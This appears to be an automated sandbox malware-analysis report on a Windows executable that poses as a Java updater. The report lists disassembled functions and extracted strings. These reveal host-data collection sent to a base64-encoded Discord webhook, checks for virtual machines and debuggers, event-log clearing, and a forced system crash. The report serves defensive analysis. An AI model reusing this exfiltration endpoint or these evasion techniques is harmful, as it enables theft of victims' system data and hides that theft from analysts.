                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$V01@memmovememset$BinaryCryptLocimp@locale@std@@NameString$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??0?$codecvt@_??1?$basic_ios@??1?$basic_iostream@??4?$_??6?$basic_ostream@Addfac@_Bid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@D@std@@@1@@ExceptionInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_ThrowUserV01@@V123@V123@@V?$basic_streambuf@VersionVfacet@23@_VolumeXlength_error@std@@Xtime_get_ticksYarn@__stdio_common_vswprintf_s_gmtime64
                                        • String ID: -d "$%08X$%Y-%m-%dT%H:%M:%S.000Z$Application$C:\$Drives$New client$Security$System$Webhook sent. Response: $aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMyMTMyODYwMjc5MjQ2MDMzMC9ROUNRTVVxaFBtbkxBOFlDR0ZpV2NOMXFzbWQ4U3pFekhWNVJjRnJJdVl4OFVXVTJiU0czZmR3NGdyMUM3QVZoSlFobQ==$embeds$h$ip address$local user$product version$serial number$system name$timestamp
                                        • API String ID: 2975285854-287537819
                                        • Opcode ID: 9b066d39bca7f0125630d68e17dcf06c2f61835fd65c2a9164d8d62af6434d99
                                        • Instruction ID: 91eea6f960a56bfab42a7a70fcfa81334f6ac954d92b69000590c9f42914a5ec
                                        • Opcode Fuzzy Hash: 9b066d39bca7f0125630d68e17dcf06c2f61835fd65c2a9164d8d62af6434d99
                                        • Instruction Fuzzy Hash: D4B27A33A2CBC6A5EB60CB24E4413EE6361FB95794F505222DA9D83B99DF7CD184C710
                                        Function 00007FF670FC4990 Relevance: 58.3, APIs: 28, Strings: 5, Instructions: 546memorycomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 282 7ff670fc4990-7ff670fc4b27 CoInitializeEx CoCreateInstance VariantInit * 4 VariantClear * 4 call 7ff670fcd9f0 286 7ff670fc4b29-7ff670fc4b53 SysAllocString 282->286 287 7ff670fc4b5b 282->287 288 7ff670fc51b4-7ff670fc51be call 7ff670fcd830 286->288 289 7ff670fc4b59 286->289 290 7ff670fc4b5e-7ff670fc4b66 287->290 298 7ff670fc51bf-7ff670fc51c9 call 7ff670fcd830 288->298 289->290 292 7ff670fc4b6c-7ff670fc4b89 290->292 293 7ff670fc51eb-7ff670fc51f5 call 7ff670fcd830 290->293 299 7ff670fc4bbb-7ff670fc4be2 call 7ff670fcd9f0 292->299 300 7ff670fc4b8b-7ff670fc4b91 292->300 301 7ff670fc51f6-7ff670fc5200 call 7ff670fcd830 293->301 311 7ff670fc51ca-7ff670fc51d4 call 7ff670fcd830 298->311 316 7ff670fc4be4-7ff670fc4c0e SysAllocString 299->316 317 7ff670fc4c16 299->317 303 7ff670fc4b93-7ff670fc4b99 SysFreeString 300->303 304 7ff670fc4b9c-7ff670fc4ba3 300->304 303->304 308 7ff670fc4bae-7ff670fc4bb6 call 7ff670fcda34 304->308 309 7ff670fc4ba5-7ff670fc4baa call 7ff670fcda34 304->309 308->299 309->308 323 7ff670fc51d5-7ff670fc51df call 7ff670fcd830 311->323 316->298 321 7ff670fc4c14 316->321 318 7ff670fc4c19-7ff670fc4c21 317->318 318->293 322 7ff670fc4c27-7ff670fc4c45 318->322 321->318 327 7ff670fc4c77-7ff670fc4c7a 322->327 328 7ff670fc4c47-7ff670fc4c4d 322->328 329 7ff670fc51e0-7ff670fc51ea call 7ff670fcd830 323->329 333 7ff670fc4cd6-7ff670fc4d1c call 7ff670fcd9f0 327->333 334 7ff670fc4c7c-7ff670fc4c86 327->334 331 7ff670fc4c4f-7ff670fc4c55 SysFreeString 328->331 332 7ff670fc4c58-7ff670fc4c5f 328->332 329->293 331->332 336 7ff670fc4c61-7ff670fc4c66 call 7ff670fcda34 332->336 337 7ff670fc4c6a-7ff670fc4c72 call 7ff670fcda34 332->337 349 7ff670fc4d50 333->349 350 7ff670fc4d1e-7ff670fc4d48 SysAllocString 333->350 334->333 338 7ff670fc4c88-7ff670fc4cd5 CoUninitialize call 7ff670fcd9d0 334->338 336->337 337->327 351 7ff670fc4d53-7ff670fc4d5b 349->351 350->311 353 7ff670fc4d4e 350->353 351->293 354 7ff670fc4d61-7ff670fc4d76 351->354 353->351 357 7ff670fc4da8-7ff670fc4ee6 354->357 358 7ff670fc4d78-7ff670fc4d7e 354->358 380 7ff670fc4ee8 357->380 381 7ff670fc4eeb-7ff670fc4f00 call 7ff670fcd9f0 357->381 359 7ff670fc4d80-7ff670fc4d86 SysFreeString 358->359 360 7ff670fc4d89-7ff670fc4d90 358->360 359->360 361 7ff670fc4d92-7ff670fc4d97 call 7ff670fcda34 360->361 362 7ff670fc4d9b-7ff670fc4da3 call 7ff670fcda34 360->362 361->362 362->357 380->381 384 7ff670fc4f35 381->384 385 7ff670fc4f02-7ff670fc4f28 SysAllocString 381->385 386 7ff670fc4f38-7ff670fc4f40 384->386 385->386 387 7ff670fc4f2a-7ff670fc4f2d 385->387 386->293 389 7ff670fc4f46-7ff670fc4f5e 386->389 387->323 388 7ff670fc4f33 387->388 388->386 391 7ff670fc4f90-7ff670fc4fdc SysAllocString 389->391 392 7ff670fc4f60-7ff670fc4f66 389->392 391->301 402 7ff670fc4fe2-7ff670fc504a VariantInit * 2 call 7ff670fcd9f0 391->402 393 7ff670fc4f71-7ff670fc4f78 392->393 394 7ff670fc4f68-7ff670fc4f6e SysFreeString 392->394 396 7ff670fc4f83-7ff670fc4f8b call 7ff670fcda34 393->396 397 7ff670fc4f7a-7ff670fc4f7f call 7ff670fcda34 393->397 394->393 396->391 397->396 405 7ff670fc507e 402->405 406 7ff670fc504c-7ff670fc5076 SysAllocString 402->406 408 7ff670fc5081-7ff670fc5088 405->408 406->329 407 7ff670fc507c 406->407 407->408 409 7ff670fc508e-7ff670fc5115 408->409 410 7ff670fc51a9-7ff670fc51b3 call 7ff670fcd830 408->410 414 7ff670fc5148-7ff670fc51a0 VariantClear * 3 CoUninitialize 409->414 415 7ff670fc5117-7ff670fc511d 409->415 410->288 414->410 416 7ff670fc511f-7ff670fc5125 SysFreeString 415->416 417 7ff670fc5128-7ff670fc512f 415->417 416->417 418 7ff670fc5131-7ff670fc5136 call 7ff670fcda34 417->418 419 7ff670fc513a-7ff670fc5147 call 7ff670fcda34 417->419 418->419 419->414
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitString$AllocFree$CreateInitializeInstanceUninitializemalloc
                                        • String ID: Application$Java Platform SE$JavaUpdater$Security$System
                                        • API String ID: 2476186896-3516896312
                                        • Opcode ID: 24fa38df1a393179961b0acccd3c08c8b86d02bbf71ef8b19e25cd5064ac1328
                                        • Instruction ID: c883ec75b90a400e7965a5aa98a1040130b107c0a50d705816ccd867bb7a85e5
                                        • Opcode Fuzzy Hash: 24fa38df1a393179961b0acccd3c08c8b86d02bbf71ef8b19e25cd5064ac1328
                                        • Instruction Fuzzy Hash: 2F423633A19B859AEB11DF34D8502AE33A0FB89B48F148226DE4D97B68DF7CD585C310
                                        Function 00007FF670FC7E10 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 303libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 428 7ff670fc7e10-7ff670fc7e4c call 7ff670fce000 431 7ff670fc7e52-7ff670fc7ebe call 7ff670fc34a0 GetUserNameW call 7ff670fc21a0 428->431 432 7ff670fc83b8-7ff670fc83df call 7ff670fcd9d0 428->432 439 7ff670fc7ec0-7ff670fc7ec9 431->439 440 7ff670fc7ecb-7ff670fc7f50 call 7ff670fc2cc0 call 7ff670fc20b0 call 7ff670fc34a0 GetComputerNameW call 7ff670fc21a0 431->440 439->439 439->440 449 7ff670fc7f52-7ff670fc7f5b 440->449 450 7ff670fc7f5d-7ff670fc8027 call 7ff670fc2cc0 call 7ff670fc20b0 call 7ff670fc34a0 call 7ff670fc1450 call 7ff670fc34a0 GetVolumeInformationW 440->450 449->449 449->450 461 7ff670fc808e-7ff670fc80ab call 7ff670fc34a0 450->461 462 7ff670fc8029-7ff670fc805f call 7ff670fc3280 call 7ff670fc21a0 450->462 465 7ff670fc80b0-7ff670fc810a call 7ff670fc34a0 memset GetVersionExW 461->465 473 7ff670fc8061-7ff670fc806a 462->473 474 7ff670fc806c-7ff670fc808c call 7ff670fc2cc0 call 7ff670fc20b0 462->474 471 7ff670fc8113-7ff670fc8133 GetModuleHandleW GetProcAddress 465->471 472 7ff670fc810c-7ff670fc810e 465->472 476 7ff670fc8135-7ff670fc8137 471->476 477 7ff670fc8139-7ff670fc818c call 7ff670fc1390 471->477 475 7ff670fc8191-7ff670fc8193 472->475 473->473 473->474 474->465 480 7ff670fc81e3-7ff670fc820c call 7ff670fc34a0 475->480 481 7ff670fc8195-7ff670fc81b1 call 7ff670fc21a0 475->481 476->475 477->475 487 7ff670fc8211-7ff670fc82e8 call 7ff670fc34a0 call 7ff670fc1780 call 7ff670fc85b0 call 7ff670fcda68 call 7ff670fc34a0 call 7ff670fc70a0 480->487 490 7ff670fc81b3-7ff670fc81bc 481->490 491 7ff670fc81be-7ff670fc81e1 call 7ff670fc2cc0 call 7ff670fc20b0 481->491 508 7ff670fc82ed-7ff670fc8303 487->508 490->490 490->491 491->487 509 7ff670fc8305-7ff670fc8310 508->509 510 7ff670fc8351-7ff670fc835c 508->510 511 7ff670fc8342-7ff670fc834a 509->511 512 7ff670fc8312-7ff670fc8326 509->512 513 7ff670fc835e-7ff670fc8372 510->513 514 7ff670fc839d-7ff670fc83b3 call 7ff670fc9ea0 510->514 511->510 516 7ff670fc833d call 7ff670fcda34 512->516 517 7ff670fc8328-7ff670fc833b 512->517 518 7ff670fc8374-7ff670fc8387 513->518 519 7ff670fc8390-7ff670fc8395 call 7ff670fcda34 513->519 514->432 516->511 517->516 521 7ff670fc8389-7ff670fc838f _invalid_parameter_noinfo_noreturn 517->521 518->519 518->521 519->514 521->519
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                        • GetUserNameW.ADVAPI32 ref: 00007FF670FC7E9D
                                          • Part of subcall function 00007FF670FC21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF670FC21C0
                                          • Part of subcall function 00007FF670FC21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF670FC2216
                                          • Part of subcall function 00007FF670FC21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF670FC2232
                                          • Part of subcall function 00007FF670FC21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FC2242
                                          • Part of subcall function 00007FF670FC21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF670FC2251
                                          • Part of subcall function 00007FF670FC21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF670FC2265
                                        • GetComputerNameW.KERNEL32 ref: 00007FF670FC7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF670FC801F
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                          • Part of subcall function 00007FF670FC34A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC3597
                                        • memset.VCRUNTIME140 ref: 00007FF670FC80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF670FC8102
                                        • GetModuleHandleW.KERNEL32 ref: 00007FF670FC811A
                                        • GetProcAddress.KERNEL32 ref: 00007FF670FC812A
                                          • Part of subcall function 00007FF670FC34A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3556
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC8389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@Name_invalid_parameter_noinfo_noreturnmemmove$??0?$codecvt@_??4?$_Addfac@_AddressBid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@HandleInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@ModuleNew_ProcUserV01@V123@V123@@VersionVfacet@23@_VolumeYarn@memset
                                        • String ID: %08X$Application$C:\$Drives$GetProductInfo$New client$Unknown$Windows %d.%d (Build %d)$ip address$kernel32.dll$local user$product version$serial number$system name
                                        • API String ID: 1900567759-3537065479
                                        • Opcode ID: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction ID: 40cf5260610fc0e876a5408c37288c45410a607e419991a02d7537d79d5acef1
                                        • Opcode Fuzzy Hash: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction Fuzzy Hash: B1F16123A286C2A9E770DF34D8523EA2361FB95348F905236DA4CC7A99DF7CD685C350
                                        Function 00007FF670FC42B0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 141windownativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 524 7ff670fc42b0-7ff670fc42e4 call 7ff670fc3e00 527 7ff670fc4320-7ff670fc4340 GetConsoleWindow ShowWindow SetConsoleCtrlHandler 524->527 528 7ff670fc42e6-7ff670fc431a RtlAdjustPrivilege NtRaiseHardError 524->528 529 7ff670fc44de-7ff670fc44fb call 7ff670fc4530 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 527->529 530 7ff670fc4346-7ff670fc435a GetConsoleWindow GetSystemMenu 527->530 528->527 535 7ff670fc4501-7ff670fc452f call 7ff670fcd9d0 529->535 532 7ff670fc436d-7ff670fc43ab GetModuleFileNameW GetFileAttributesW SetFileAttributesW 530->532 533 7ff670fc435c-7ff670fc4367 RemoveMenu 530->533 532->535 536 7ff670fc43b1-7ff670fc43c8 532->536 533->532 538 7ff670fc43d0-7ff670fc4406 GdiplusStartup call 7ff670fc47d0 536->538 542 7ff670fc4412-7ff670fc443d call 7ff670fc7e10 CoUninitialize 538->542 543 7ff670fc4408-7ff670fc440d call 7ff670fc4990 538->543 548 7ff670fc4442-7ff670fc4453 OpenEventLogW 542->548 543->542 549 7ff670fc4455-7ff670fc4463 ClearEventLogW CloseEventLog 548->549 550 7ff670fc4469-7ff670fc4478 548->550 549->550 550->548 551 7ff670fc447a-7ff670fc4481 550->551 552 7ff670fc4483 551->552 553 7ff670fc448a-7ff670fc4493 551->553 552->553 554 7ff670fc4495-7ff670fc44ac 553->554 555 7ff670fc44c8-7ff670fc44cf 553->555 557 7ff670fc44ae-7ff670fc44c1 554->557 558 7ff670fc44c3 call 7ff670fcda34 554->558 555->538 556 7ff670fc44d5 555->556 556->535 557->558 560 7ff670fc44d7-7ff670fc44dd _invalid_parameter_noinfo_noreturn 557->560 558->555 560->529
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$ConsoleEventFileWindow$?good@ios_base@std@@AttributesMenuV01@$??6?$basic_ostream@?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@AdjustClearCloseCtrlErrorGdiplusHandlerHardModuleNameOpenOsfx@?$basic_ostream@PrivilegeRaiseRemoveShowStartupSystemUninitializeV01@@V12@_invalid_parameter_noinfo_noreturn
                                        • String ID: Application$Security$System
                                        • API String ID: 1039291073-2169399579
                                        • Opcode ID: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction ID: 189735eca92d69c56bc9bd5e1c0edb7911a71867e57c8b36ff1d0345d232dacd
                                        • Opcode Fuzzy Hash: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction Fuzzy Hash: EF615D22A2CAC2A2EB54DB24F4593AA63A1FF85784F644135DD4DC3BA4DF7CE445C720
                                        Function 00007FF670FC1780 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 275COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 561 7ff670fc1780-7ff670fc17fc call 7ff670fc34a0 GetLogicalDriveStringsA 564 7ff670fc1bc2-7ff670fc1bef call 7ff670fcd9d0 561->564 565 7ff670fc1802-7ff670fc1807 561->565 565->564 566 7ff670fc180d-7ff670fc18b4 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ 565->566 569 7ff670fc1a7c-7ff670fc1aa6 566->569 570 7ff670fc18ba 566->570 571 7ff670fc1aa8-7ff670fc1ab2 569->571 572 7ff670fc1ac7-7ff670fc1aca 569->572 573 7ff670fc18c0-7ff670fc1907 call 7ff670fc34a0 GetDriveTypeA 570->573 571->572 574 7ff670fc1ab4-7ff670fc1ac5 571->574 575 7ff670fc1aee-7ff670fc1af3 572->575 576 7ff670fc1acc-7ff670fc1ad6 572->576 581 7ff670fc1909-7ff670fc190c 573->581 582 7ff670fc1968-7ff670fc196f 573->582 579 7ff670fc1af8-7ff670fc1afb 574->579 575->579 576->575 580 7ff670fc1ad8-7ff670fc1aec 576->580 583 7ff670fc1b11-7ff670fc1b1c 579->583 584 7ff670fc1afd-7ff670fc1b0c call 7ff670fc30a0 579->584 580->579 587 7ff670fc190e-7ff670fc1911 581->587 588 7ff670fc1959-7ff670fc1966 581->588 589 7ff670fc1975-7ff670fc19ba call 7ff670fc30a0 call 7ff670fc3ac0 * 2 582->589 585 7ff670fc1b1e-7ff670fc1b26 583->585 586 7ff670fc1b47-7ff670fc1b4b 583->586 584->583 585->586 591 7ff670fc1b28-7ff670fc1b42 call 7ff670fc30a0 585->591 594 7ff670fc1b84-7ff670fc1bbc call 7ff670fc2870 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 586->594 595 7ff670fc1b4d-7ff670fc1b60 586->595 592 7ff670fc1913-7ff670fc1916 587->592 593 7ff670fc194a-7ff670fc1957 587->593 588->589 616 7ff670fc19c1-7ff670fc19c9 589->616 591->586 599 7ff670fc1918-7ff670fc191b 592->599 600 7ff670fc193b-7ff670fc1948 592->600 593->589 594->564 601 7ff670fc1b7e-7ff670fc1b83 call 7ff670fcda34 595->601 602 7ff670fc1b62-7ff670fc1b75 595->602 606 7ff670fc191d-7ff670fc192a 599->606 607 7ff670fc192c-7ff670fc1939 599->607 600->589 601->594 602->601 608 7ff670fc1b77-7ff670fc1b7d _invalid_parameter_noinfo_noreturn 602->608 606->589 607->589 608->601 616->616 617 7ff670fc19cb-7ff670fc19dc 616->617 618 7ff670fc19de-7ff670fc19f0 617->618 619 7ff670fc1a0c-7ff670fc1a23 617->619 620 7ff670fc19f2-7ff670fc1a05 618->620 621 7ff670fc1a07 call 7ff670fcda34 618->621 622 7ff670fc1a25-7ff670fc1a37 619->622 623 7ff670fc1a53-7ff670fc1a57 619->623 620->621 624 7ff670fc1a67-7ff670fc1a6d _invalid_parameter_noinfo_noreturn 620->624 621->619 626 7ff670fc1a4e call 7ff670fcda34 622->626 627 7ff670fc1a39-7ff670fc1a4c 622->627 628 7ff670fc1a75-7ff670fc1a78 623->628 629 7ff670fc1a59-7ff670fc1a62 call 7ff670fc32e0 623->629 630 7ff670fc1a6e-7ff670fc1a74 _invalid_parameter_noinfo_noreturn 624->630 626->623 627->626 627->630 628->569 629->573 630->628
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00007FF670FC17F4
                                        • memset.VCRUNTIME140 ref: 00007FF670FC1819
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC1838
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF670FC1852
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC1883
                                        • GetDriveTypeA.KERNELBASE ref: 00007FF670FC18FE
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC1A67
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC1A6E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC1B77
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC1BB2
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC1BBC
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$Drivememmove$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@LogicalStringsTypeV?$basic_streambuf@memset
                                        • String ID: (CD-ROM)$ (Local)$ (Network)$ (RAM Disk)$ (Removable)$ (Unknown)$No drives detected
                                        • API String ID: 3633658073-1332592045
                                        • Opcode ID: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction ID: 4e193bac3b1e8419787b5d52fdf5fa24ccfcd2858cd7a5eaa66ac709f7fc4f96
                                        • Opcode Fuzzy Hash: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction Fuzzy Hash: 49D19963A2CBC2A5EB10CB65E4512AE67A1FB86794F504236DE4DC3BA8DF7CD184C710
                                        Function 00007FF670FC3EC9 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 84processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_wcsicmpmemset
                                        • String ID: QEMU$Security check failed!$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 4057197811-609307201
                                        • Opcode ID: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction ID: 951ae1808cf73ca7d12345ff13f3b235fa76b36774bc7d76bb3ea89ff17ad842
                                        • Opcode Fuzzy Hash: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction Fuzzy Hash: 15412527B2CA86A4EB44DB60E8552B92372FB44798F944236CD1DD37A4DF3CE649C320
                                        Function 00007FF670FC3FEA Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 62librarynativeloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Library$FreeProcess$AddressCurrentInformationLoadProcQuery
                                        • String ID: NtQueryInformationProcess$QEMU$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$ntdll.dll$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3226424356-3571693660
                                        • Opcode ID: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction ID: cbe2f9e68ec8a7cc90c471270a4e52c6ed49ebc976a6e004f1f20c377a596412
                                        • Opcode Fuzzy Hash: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction Fuzzy Hash: F9310A27A2CB87A1EA519B10E4257BA2761FF48788FA40132CE4DD3764DF7DE549C320
                                        Function 00007FF670FC4130 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 70registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
